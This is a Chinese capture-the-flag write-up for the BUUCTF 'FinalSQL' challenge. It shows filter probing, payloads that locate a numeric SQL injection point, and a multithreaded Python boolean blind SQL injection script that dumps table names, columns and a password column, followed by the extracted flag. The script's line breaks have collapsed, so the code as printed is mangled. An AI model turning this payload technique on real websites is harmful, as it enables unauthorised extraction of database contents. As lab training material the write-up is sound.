[极客大挑战 2019]FinalSQL
先看过滤:
这么多!
题目有提示:
大家好!我是练习时常两年半的,个人WEB程序员cl4y,我会php,PYTHON,mysql,SQL盲注
应该用布尔盲注。先找注入点,引号、and、or、异或都不能用,连select也禁用了。布尔盲注用不了啊这。看来注入点不在这里。
发现有/search.php?id=1,注入点应该就是id了,看一下过滤:
找注入点:
id | 回显 | 推断 |
---|---|---|
1' | Error | |
0'or'1 | Error | |
0'or'0 | Error | |
2-1 | NO! Not this! Click others~~~ | 数字型注入 |
2-(1=1) | NO! Not this! Click others~~~ | |
2-(1=0) | yingyingying~ Not this as well~~ | 找到注入点 |
字符截取:substr()
判断:ord()+'='
尝试一下:2-(ord(substr('a',1,1))=97) 回显NO! Not this! Click others~~~说明可以
直接脚本跑。
结果:
table_name: F1naI1y,Flaaaaag column in Flaaaaag: id,fl4gawsl
爆破fl4gawsl的时候发现长度非常长,然后直接看一下id=1的值发现就是现在使用的表,题目中有提示Clever! But not this table.所以肯定在F1naI1y表中了。
字段很长,利用多线程缩短时间。有访问限制,需要使用二分法,减少访问次数。
在之前的脚本上进行了一些修改:
import random
import time
import requests
from concurrent.futures import ThreadPoolExecutorurl = 'http://f46c82ad-e8f5-49f4-8205-25c0d2bf1830.node5.buuoj.cn:81/search.php'
symbol = "NO! Not this! Click others"
# select = 'select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())'
# select = 'select(group_concat(column_name))from(information_schema.columns)where((table_name)=("F1naI1y"))'
select = 'select(group_concat(password))from(F1naI1y)'
length = 0
result = [''] * 1000 # 使用列表存储结果,避免线程安全问题def make_request(url, param):try:r = requests.get(url, params=param, timeout=30)r.raise_for_status() # 检查HTTP状态码return rexcept requests.exceptions.Timeout:print("[-] 请求超时,请检查网络连接或增加超时时间")except requests.exceptions.HTTPError as e:print(f"[-] HTTP错误: {e.response.status_code}")except requests.exceptions.RequestException as e:print(f"[-] 请求异常: {str(e)}")return Nonedef make_request_with_retry(url, param):global resultr = make_request(url, param)if not r:print("[-] 重试")time.sleep(random.randint(0, 10))r = make_request(url, param)if not r:return Nonereturn rdef get_length():global lengthfor i in range(0, 500):param = {"id": f"2-(({select_len})={i})",}r = make_request(url, param)if not r:print("[-] 重试")time.sleep(5)r = make_request(url, param)if not r:print("[-] 数字{i}跳过")# print(r.text)# print(f"2-(({select_len})={i})")if symbol in r.text:print(f"长度为{i}")length = ibreakdef get_length_with_BinarySearch():global lengthlow, high = 0, 500while low <= high:mid = (low + high) // 2param = {"id": f"2-(({select_len})>={mid})"}r = make_request_with_retry(url, param)if not r:print(f"[-]重试数字{mid}")r = make_request_with_retry(url, param)if not r:print(f"[-]长度爆破失败")if symbol in r.text:# 大于等于midparam = {"id": f"2-(({select_len})={mid})"}r = make_request_with_retry(url, param)if not r:print(f"[-]重试数字{mid}")r = make_request_with_retry(url, param)if not r:print(f"[-]长度爆破失败")if symbol in r.text:print(f"长度为{mid}")length = midbreakelse:# 大于midlow = mid + 1else:# 小于midhigh = mid - 1def get_char_at_position(i):global resultprint(f"[*] 开始注入位置{i}...")low, high = 31, 127while low <= high:mid = (low + high) // 2param = {"id": f"2-(ord(substr(({select}),{i},1))>={mid})"}r = make_request_with_retry(url, param)if not r:print(f"[-] 位置{i}未找到!!!!!!!!!!!")result[i - 1] = '?'breakif symbol in r.text:# 大于等于midparam = {"id": f"2-(ord(substr(({select}),{i},1))={mid})"}r = make_request_with_retry(url, param)if not r:print(f"[-] 位置{i}未找到!!!!!!!!!!!")result[i - 1] = '?'breakif symbol in r.text:# 等于midresult[i - 1] = chr(mid)print(f"[*] 位置{i}字符为{chr(mid)}")breakelse:# 大于midlow = mid + 1else:# 小于midhigh = mid - 1# ------------------爆破长度# select_len = 'select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema=database())'
# select_len = 'select(length(group_concat(column_name)))from(information_schema.columns)where((table_name)=("F1naI1y"))'
select_len = 'select(length(group_concat(password)))from(F1naI1y)'get_length_with_BinarySearch()if length == 0:print("[-] length为0,请检查错误")exit(0)# ------------------多线程爆破
with ThreadPoolExecutor(max_workers=10) as executor:futures = [executor.submit(get_char_at_position, i) for i in range(150, length+1)]# 等待所有任务完成for future in futures:future.result()# # ------------------单线程爆破
# for i in range(1, length+1):
# get_char_at_position(i)# 过滤空字符并拼接结果
final_result = ''.join(filter(None, result))
print("最终结果:", final_result)
跑出来是cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{aba4f8e7-b693-4b96-aa72-98b241ea24e5}。